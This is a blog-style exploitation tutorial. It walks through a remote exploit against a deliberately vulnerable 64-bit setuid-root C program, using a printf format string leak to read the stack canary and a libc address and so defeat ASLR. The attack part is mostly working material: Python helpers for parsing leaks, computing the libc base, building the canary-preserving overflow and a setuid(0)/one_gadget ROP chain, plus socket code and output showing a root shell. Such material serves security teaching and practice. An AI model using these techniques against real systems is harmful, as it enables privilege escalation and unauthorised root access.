Format String Exploits: Defeating Stack Canary, NX and ASLR Remotely on 64 bit

Hey. Welcome back. Last time we learned how to bypass the NX bit by making the stack executable again with functions like mprotect() and then running our shellcode. This time we will look at a different class of vulnerability from our usual stack overflows. Format string vulnerabilities seem innocent at first, but they can put a lot of critical information at an attacker's disposal. We will develop a remote exploit and defeat the stack canary, the NX bit and ASLR.

Let's dive into a simple example program. It first asks for the user's name and then for a secret code. It could then verify the code or do something else with it, but for now we will focus only on that part. You can clearly see a buffer overflow vulnerability: the secret code is read with gets(). A read() call with improper bounds checking would be just as exploitable. Buffering for stdin and stdout is turned off with setvbuf(), since we will serve this program over a network. Did you notice 'printf(name);' on line 21 of the code? It looks like a lazy programmer's mistake: the buffer pointed to by name is passed directly as the format string, instead of as an argument to a fixed format such as "%s". It seems harmless, but how does it behave if we put format specifiers in name? Let's check it out. First compile the code. We are on a 64 bit system, and this time we keep all default protection mechanisms and ASLR on, so no extra flags are required. On the target server, make the binary setuid root.
virtual@mecha:~$ gcc format.c -o format
virtual@mecha:~$ sudo chown root format
virtual@mecha:~$ sudo chmod +s format
Now we will serve it on a port with this command.
virtual@mecha:~$ socat tcp-listen:5555,reuseaddr,fork, exec:"./format"
It listens on tcp port 5555 and whenever a connection is made, it executes "./format". You can check by connecting to server with netcat or telnet on port 5555.
virtual@mecha:~$ nc 5555
What is your name?
Name: Attacker
Hello Attacker
Enter secret code !
Code: s3cr3tc0d3
Entered Command centre with code > s3cr3tc0d3 .
Great, it's working over the network. Let's pass some format specifiers as the name. I have passed '%lx' 15 times, separated by '-'.
virtual@mecha:~$ nc 5555
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
Hello 7ffeae3fd1b0-7f69459f8720-0-7f6945bde4c0-7f6945bde4c0-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-7ffeae3ff980-9a7b045172d7ef00
Enter secret code !
Code: s3cr3tc0d3
Entered Command centre with code > s3cr3tc0d3 .
What are those weird hexadecimal values? Notice that '2d786c25' keeps repeating. If you look it up in an ASCII table, those are the bytes of '%lx-' (25 6c 78 2d) shown in reverse order, because x86-64 is little-endian. That is our own input sitting in the name buffer, which means the format string has printed the contents of the stack back to us. Some addresses are leaked too. You can verify this by loading the program in gdb and dumping the stack. Here '%lx' prints a long in hexadecimal, since this is 64 bit, and '-' separates the values. In this article we will use those leaked addresses to find the libc base address and to leak the stack canary. We will then use both to do a successful return to libc by overflowing the buffer while entering the secret code. Let's load the program in gdb and analyze it.
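Before moving on to gdb, the decoding described above can be checked with a few lines of Python. This is only a small sketch; the helper name word_to_bytes is made up for illustration, and the two input words are copied from the output above.

```python
# Decode values printed by %lx back into the bytes that sit in memory.
# x86-64 is little-endian, so the lowest-addressed byte is the LAST hex pair.

def word_to_bytes(hex_word):
    """Convert one %lx output field into its in-memory byte order."""
    value = int(hex_word, 16)
    # %lx drops leading zeros, so size the result from the value itself.
    length = max(1, (value.bit_length() + 7) // 8)
    return value.to_bytes(length, "little")

full_word = word_to_bytes("2d786c252d786c25")  # a full 8-byte stack word
tail_word = word_to_bytes("a786c25")           # the last, partial word

print(full_word)
print(tail_word)
```

The full word decodes to two copies of '%lx-', and the shorter one to the final '%lx' followed by the newline that ended our input.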
virtual@mecha:~$ gdb format -q
Reading symbols from format...(no debugging symbols found)...done.
gdb-peda$ checksec
FORTIFY   : disabled
NX        : ENABLED
RELRO     : Partial
gdb-peda$ aslr
gdb-peda$ disas center 
Dump of assembler code for function center:
   0x0000000000000815 <+0>: push   rbp
   0x0000000000000816 <+1>: mov    rbp,rsp
   0x0000000000000819 <+4>: sub    rsp,0x90
   0x0000000000000820 <+11>: mov    rax,QWORD PTR fs:0x28
   0x0000000000000829 <+20>: mov    QWORD PTR [rbp-0x8],rax
   0x000000000000082d <+24>: xor    eax,eax
   0x000000000000082f <+26>: lea    rdi,[rip+0x1b2]        # 0x9e8
   0x0000000000000836 <+33>: mov    eax,0x0
   0x000000000000083b <+38>: call   0x6e0 <printf@plt>
   0x0000000000000840 <+43>: lea    rax,[rbp-0x90]
   0x0000000000000847 <+50>: mov    rdi,rax
   0x000000000000084a <+53>: mov    eax,0x0
   0x000000000000084f <+58>: call   0x710 <gets@plt>
   0x0000000000000854 <+63>: lea    rax,[rbp-0x90]
   0x000000000000085b <+70>: mov    rsi,rax
   0x000000000000085e <+73>: lea    rdi,[rip+0x1a3]        # 0xa08
   0x0000000000000865 <+80>: mov    eax,0x0
   0x000000000000086a <+85>: call   0x6e0 <printf@plt>
   0x000000000000086f <+90>: nop
   0x0000000000000870 <+91>: mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000000874 <+95>: xor    rax,QWORD PTR fs:0x28
   0x000000000000087d <+104>: je     0x884 <center+111>
   0x000000000000087f <+106>: call   0x6d0 <__stack_chk_fail@plt>
   0x0000000000000884 <+111>: leave  
   0x0000000000000885 <+112>: ret    
End of assembler dump.
gdb-peda$ b *center +95
Breakpoint 1 at 0x874
As you can see, most memory protections, such as the stack canary and the NX bit, are on. We will keep ASLR disabled in gdb for now to make the analysis easier. We have already verified the format string vulnerability in name, so let's check the buffer overflow and the stack canary. Disassemble the center function and set a breakpoint at *center+95, where the canary saved on the stack is compared with the original value. If they differ, __stack_chk_fail is called.

Stack Canaries

A stack canary is a random value placed between the local buffers and the saved frame pointer and return address, and checked before the function returns. If a buffer overflow occurs, the canary is overwritten, the check fails, and the program aborts through __stack_chk_fail. On Linux the lowest byte of the canary is a null byte (the value ends in '00' when printed), which stops string functions like strcpy from copying past it. That does not help against gets(), which stops only at a newline, so we don't have to worry about null bytes here. We will leak the canary through the format string vulnerability. Bruteforcing it can be feasible on 32 bit systems, but it is not really practical on 64 bit. Run the program with the format string again and fill the code buffer with 128 'A's.
gdb-peda$ r
Starting program: /home/archer/compiler_tests/format 
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-
Hello 7ffec094b550-7fbb5533a720-0-7fbb555204c0-7fbb555204c0-2d786c252d786c25-2d786c252d786c25-
Enter secret code !
RAX: 0x7068c9a76fdc1c00 
RBX: 0x0 
RCX: 0x0 
RDX: 0x7fbb5533a720 --> 0x0 
RSI: 0x7ffec094b4b0 ("Entered Command center with code > ", 'A' , " .\n94b550-7fbb5533a720-0-7fbb555204c0"...)
RDI: 0x0 
RBP: 0x7ffec094dbe0 --> 0x7ffec094dc40 --> 0x555aec917960 (<__libc_csu_init>: push   r15)
RSP: 0x7ffec094db50 ('A' )
RIP: 0x555aec917874 (<center+95>: xor    rax,QWORD PTR fs:0x28)
R8 : 0x7fbb555204c0 (0x00007fbb555204c0)
R9 : 0x7ffec094af60 --> 0x0 
R10: 0x0 
R11: 0x246 
R12: 0x555aec917730 (<_start>: xor    ebp,ebp)
R13: 0x7ffec094dd20 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
   0x555aec91786a <center+85>: call   0x555aec9176e0 <printf@plt>
   0x555aec91786f <center+90>: nop
   0x555aec917870 <center+91>: mov    rax,QWORD PTR [rbp-0x8]
=> 0x555aec917874 <center+95>: xor    rax,QWORD PTR fs:0x28
   0x555aec91787d <center+104>: je     0x555aec917884 <center+111>
   0x555aec91787f <center+106>: call   0x555aec9176d0 <__stack_chk_fail@plt>
   0x555aec917884 <center+111>: leave  
   0x555aec917885 <center+112>: ret
0000| 0x7ffec094db50 ('A' )
0008| 0x7ffec094db58 ('A' )
0016| 0x7ffec094db60 ('A' )
0024| 0x7ffec094db68 ('A' )
0032| 0x7ffec094db70 ('A' )
0040| 0x7ffec094db78 ('A' )
0048| 0x7ffec094db80 ('A' )
0056| 0x7ffec094db88 ('A' )
Legend: code, data, rodata, value

Breakpoint 1, 0x0000555aec917874 in center ()
The stack canary, '0x7068c9a76fdc1c00' here, is loaded into rax and then checked. If you look at the memory dumped by our format string, the last (15th) value is exactly this canary. Yeah, we leaked the stack canary. First problem solved. Now, to bypass the NX bit, we will do a return to libc. But ASLR will be on, so we need to find the libc base address on every run. To solve this we will use the addresses leaked by the format string. You can also leak such addresses to find the approximate position of your shellcode.
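Picking the canary out of the reply is plain string handling. The following is a minimal sketch, assuming the reply has the 'Hello a-b-c-...' shape seen earlier; parse_leak is a hypothetical helper name, and the sample line is the output of the first netcat session above.

```python
def parse_leak(line):
    """Split a 'Hello a-b-c...' reply into integers, one per %lx field."""
    fields = line.split("Hello", 1)[1].strip().split("-")
    return [int(field, 16) for field in fields if field]

reply = ("Hello 7ffeae3fd1b0-7f69459f8720-0-7f6945bde4c0-7f6945bde4c0-"
         "2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-"
         "2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-"
         "7ffeae3ff980-9a7b045172d7ef00")

values = parse_leak(reply)
canary = values[14]      # 15th value: the stack canary
libc_leak = values[3]    # 4th value: an address at a fixed distance from libc

# Sanity check: the lowest byte of a Linux stack canary is a null byte.
assert canary & 0xff == 0

print(hex(canary), hex(libc_leak))
```

The positions 15 and 4 hold for this binary and this format string only; a different build would need its own offsets.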
gdb-peda$ vmmap
Start              End                Perm Name
0x00007fbb54f82000 0x00007fbb55135000 r-xp /usr/lib/
If you look carefully at the dumped values, you will notice that some of them are addresses close to libc. The first five values printed by '%lx' actually come from the argument registers rsi, rdx, rcx, r8 and r9 (compare RDX and R8 in the register dump above), which still hold pointers left over from earlier library calls. These pointers refer to fixed locations relative to libc, so whenever you run the program they point to the same things. Even with ASLR on, only the absolute addresses change; each one keeps the same offset from the libc base. We can take one of these addresses, calculate its offset from the libc base once, and use that offset on every run to recover the base. Time to turn ASLR on and find the offset.
gdb-peda$ aslr on
gdb-peda$ aslr
gdb-peda$ r
Starting program: /home/archer/compiler_tests/format 
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx 
Hello 7ffe72f66210-7fc16bb5a720-0-7fc16bd404c0-7fc16bd404c0-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-7ffe72f689e0-87f4107dcd08200
Enter secret code !
RAX: 0x87f4107dcd08200 
RBX: 0x0 
RCX: 0x0 
RDX: 0x7fc16bb5a720 --> 0x0 
RSI: 0x7ffe72f66170 ("Entered Command center with code > ", 'A' , " .\nf66210-7fc16bb5a720-0-7fc16bd404c0"...)
RDI: 0x0 
RBP: 0x7ffe72f688a0 --> 0x7ffe72f68900 --> 0x5581705e8960 (<__libc_csu_init>: push   r15)
RSP: 0x7ffe72f68810 ('A' )
RIP: 0x5581705e8874 (<center+95>: xor    rax,QWORD PTR fs:0x28)
R8 : 0x7fc16bd404c0 (0x00007fc16bd404c0)
R9 : 0x7ffe72f65c20 --> 0x0 
R10: 0x0 
R11: 0x246 
R12: 0x5581705e8730 (<_start>: xor    ebp,ebp)
R13: 0x7ffe72f689e0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
   0x5581705e886a <center+85>: call   0x5581705e86e0 <printf@plt>
   0x5581705e886f <center+90>: nop
   0x5581705e8870 <center+91>: mov    rax,QWORD PTR [rbp-0x8]
=> 0x5581705e8874 <center+95>: xor    rax,QWORD PTR fs:0x28
   0x5581705e887d <center+104>: je     0x5581705e8884 <center+111>
   0x5581705e887f <center+106>: call   0x5581705e86d0 <__stack_chk_fail@plt>
   0x5581705e8884 <center+111>: leave  
   0x5581705e8885 <center+112>: ret
0000| 0x7ffe72f68810 ('A' )
0008| 0x7ffe72f68818 ('A' )
0016| 0x7ffe72f68820 ('A' )
0024| 0x7ffe72f68828 ('A' )
0032| 0x7ffe72f68830 ('A' )
0040| 0x7ffe72f68838 ('A' )
0048| 0x7ffe72f68840 ('A' )
0056| 0x7ffe72f68848 ('A' )
Legend: code, data, rodata, value

Breakpoint 1, 0x00005581705e8874 in center ()
gdb-peda$ vmmap
Start              End                Perm Name
0x00007fc16b7a2000 0x00007fc16b955000 r-xp /usr/lib/
I am choosing the 4th value, which seems to belong to libc, and calculating its offset from the libc base.
0x7fc16bd404c0-0x00007fc16b7a2000 = 0x59e4c0
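The same subtraction can be checked against both gdb runs shown so far. This is a small sketch, assuming the target uses the same libc build as this machine; libc_base_from_leak is a hypothetical helper name, and the addresses are copied from the two vmmap outputs and the 4th leaked value of each run.

```python
# Offset of the 4th leaked value from the libc base, measured above.
# Valid only for this particular libc build.
LEAK_OFFSET = 0x59e4c0

def libc_base_from_leak(leak):
    """Recover the libc base from the 4th leaked value."""
    base = leak - LEAK_OFFSET
    # The base of a mapping is page aligned, so its low 12 bits must be 0.
    if base & 0xfff:
        raise ValueError("base not page aligned: wrong libc or wrong leak")
    return base

# (4th leaked value, libc base reported by vmmap) for the two gdb runs.
runs = [
    (0x7fbb555204c0, 0x7fbb54f82000),  # run with ASLR off in gdb
    (0x7fc16bd404c0, 0x7fc16b7a2000),  # run with ASLR on
]

for leak, expected in runs:
    base = libc_base_from_leak(leak)
    print(hex(leak), "->", hex(base), base == expected)
```

The alignment check is a cheap guard: if the target runs a different libc, the computed base will usually not end in '000'.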
Cool. This offset will be the same on every run for the 4th value, as long as the target uses the same libc build. Now you can find the offsets of the stack canary and the return address, either from a direct stack dump or with a cyclic pattern.
0x7ffe72f68870: 0x4141414141414141 0x4141414141414141
0x7ffe72f68880: 0x4141414141414141 0x4141414141414141
0x7ffe72f68890: 0x0000000000000000 0x087f4107dcd08200  <== canary
0x7ffe72f688a0: 0x00007ffe72f68900 0x00005581705e893d  <== return address
virtual@mecha:~$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x3765413665413565
[*] Exact match at offset 136
It turned out to be 136 for the stack canary and 152 for the return address on my system, so the layout is:
code = 'A'*136 + canary(8) + 'B'*8 + return_address(8)
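In Python this layout can be sketched with struct.pack. The names p64 and build_overflow are made up for illustration, the canary is the one from the gdb run above, and 0xdeadbeef is just a placeholder return address.

```python
import struct

CANARY_OFFSET = 136  # bytes from the start of the code buffer to the canary

def p64(value):
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)

def build_overflow(canary, chain):
    """Filler + leaked canary + fake saved rbp + whatever replaces the return address."""
    payload = b"A" * CANARY_OFFSET   # fills the buffer up to the canary
    payload += p64(canary)           # put the leaked canary back unchanged
    payload += b"B" * 8              # overwrites the saved rbp
    payload += chain                 # starts at offset 152: the return address
    return payload

demo = build_overflow(0x087f4107dcd08200, p64(0xdeadbeef))
print(len(demo))
```

Note that gets() stops reading at a newline, so a payload whose canary or addresses happen to contain the byte 0x0a would be cut short on that run.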
Put your glasses on, it's time to write the remote exploit.

Since we are serving the program over a network, I will simply use telnetlib in Python to connect and interact with it. You can use the pwntools library too, and we will see more of it in future articles, but for simplicity I'm sticking with telnetlib. Our strategy is to first send the format string, then read the output and extract the libc address and the stack canary. From the address we calculate the libc base and generate a return to libc payload.

We will call setuid(0) first, because many shells drop setuid privileges when the effective and real user IDs differ. Since this is 64 bit, we pop 0x0 into the rdi register so that it is passed to setuid as its first argument. For executing '/bin/sh' I'm simply using a one_gadget execve. You can install the one_gadget tool with $ gem install one_gadget.

One thing we are assuming here is that we know the libc version of the target and can craft the return to libc accordingly. When you don't know the libc version, you can leak more memory and match the dumped addresses against known offsets. Online libc databases also help to identify the target's libc version from such leaks. Because the libc base is page aligned, its last 3 hex digits are always '000', so the last 3 hex digits of a leaked address are the same as the last 3 hex digits of its offset. This is even easier on 32 bit, as addresses are smaller. We can also leak addresses from the Global Offset Table. We will learn more about using such leaks, and more ways to leak, in the next articles.
virtual@mecha:~$ one_gadget /usr/lib/
0x43b88 execve("/bin/sh", rsp+0x30, environ)
  rax == NULL

0x43bdc execve("/bin/sh", rsp+0x30, environ)
  [rsp+0x30] == NULL

0xe49c0 execve("/bin/sh", rsp+0x60, environ)
  [rsp+0x60] == NULL
You can find more ROP gadgets with the ROPgadget or Ropper tools. Next, find the offset of setuid.
virtual@mecha:~$ readelf -a /usr/lib/ | grep setuid
    23: 00000000000c67a0   145 FUNC    WEAK   DEFAULT   12 setuid@@GLIBC_2.2.5
  1604: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS setuid.c
  5134: 00000000000c67a0   145 FUNC    LOCAL  DEFAULT   12 __setuid
  5878: 00000000000c67a0   145 FUNC    WEAK   DEFAULT   12 setuid
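With these offsets the return to libc chain can be sketched as below. The setuid and one_gadget offsets come from the outputs above and apply to this libc build only. The offset of a 'pop rdi; ret' gadget is not shown in this article, so it is left as a parameter, and the value 0x1000 in the demo is purely a made-up placeholder. I am also assuming the first one_gadget here: its constraint is rax == NULL, and setuid(0) returns 0 in rax on success.

```python
import struct

SETUID_OFFSET = 0xc67a0       # from the readelf output above
ONE_GADGET_OFFSET = 0x43b88   # from one_gadget; needs rax == NULL

def build_chain(libc_base, pop_rdi_ret_offset):
    """ROP chain: setuid(0), then jump into the execve("/bin/sh") gadget."""
    words = [
        libc_base + pop_rdi_ret_offset,  # pop rdi; ret (offset supplied by caller)
        0,                               # value popped into rdi: uid 0
        libc_base + SETUID_OFFSET,       # setuid(0)
        libc_base + ONE_GADGET_OFFSET,   # execve("/bin/sh", rsp+0x30, environ)
    ]
    return b"".join(struct.pack("<Q", word) for word in words)

# 0x1000 is a HYPOTHETICAL gadget offset, for demonstration only.
chain = build_chain(0x7fb462891000, 0x1000)
print(chain.hex())
```

The chain goes at offset 152 of the overflow, right after the canary and the 8 bytes that overwrite the saved rbp.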
Putting everything together, here's my simple exploit code. I have commented each line with an explanation. Here's how the stack layout will look after the exploit.
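As a rough Python 3 sketch of the network side only (not the telnetlib script used in this article), the leak step could look like this with plain sockets. The function names are made up for illustration, and the prompt markers 'Name:' and 'Code:' are taken from the session output above.

```python
import socket

def recv_until(sock, marker):
    """Read from the socket until marker shows up in the received data."""
    data = b""
    while marker not in data:
        chunk = sock.recv(4096)
        if not chunk:
            raise EOFError("connection closed before marker arrived")
        data += chunk
    return data

def leak_values(sock, count=15):
    """Answer the name prompt with %lx specifiers and parse the reply."""
    recv_until(sock, b"Name:")
    sock.sendall(b"-".join([b"%lx"] * count) + b"\n")
    reply = recv_until(sock, b"Code:")
    # Keep only the 'Hello ...' line and split it into hex fields.
    line = reply.split(b"Hello", 1)[1].split(b"\n", 1)[0]
    return [int(f, 16) for f in line.decode().strip().split("-") if f]

def connect(host="localhost", port=5555):
    """Open a TCP connection to the socat listener."""
    return socket.create_connection((host, port))
```

A run would call connect(), pass the socket to leak_values(), build the payload from the 15th and 4th values, send it followed by a newline, and then relay shell commands over the same socket.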

Run it.
virtual@mecha:~$ python2                          
Enter this command to setup a server. 5555 is port !
 $ socat tcp-listen:5555,fork, exec:'./format'

[i] Enter target ip (localhost):
[i] Enter target port (5555): 5555
[i] Connecting to server
What is your name?
[' Hello 7ffdec247930', '7fb462c49720', '0', '7fb462e2f4c0', '7fb462e2f4c0', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c25', '7ffdec24a100', '3fe25b5b8083e400', 'Enter secret code !\nCode:']
[+] Found Stack Canary   : 0x3fe25b5b8083e400
[+] Calculated Libc base : 0x7fb462891000
[i] Payload generated
[+] Shell ready. Enter commands !

uid=0(root) gid=1000(virtual) groups=1000(virtual),10(wheel)
Awesome. We wrote a remote exploit, and since the binary was setuid root, we got root privileges.

Well, that's all for now. In the next articles we will learn more about the GOT and PLT, how powerful format string exploits can be, and more exploitation techniques. Keep practicing.

For any queries contact : @ShivamShrirao

Next Read: Return to PLT, GOT to bypass ASLR remotely

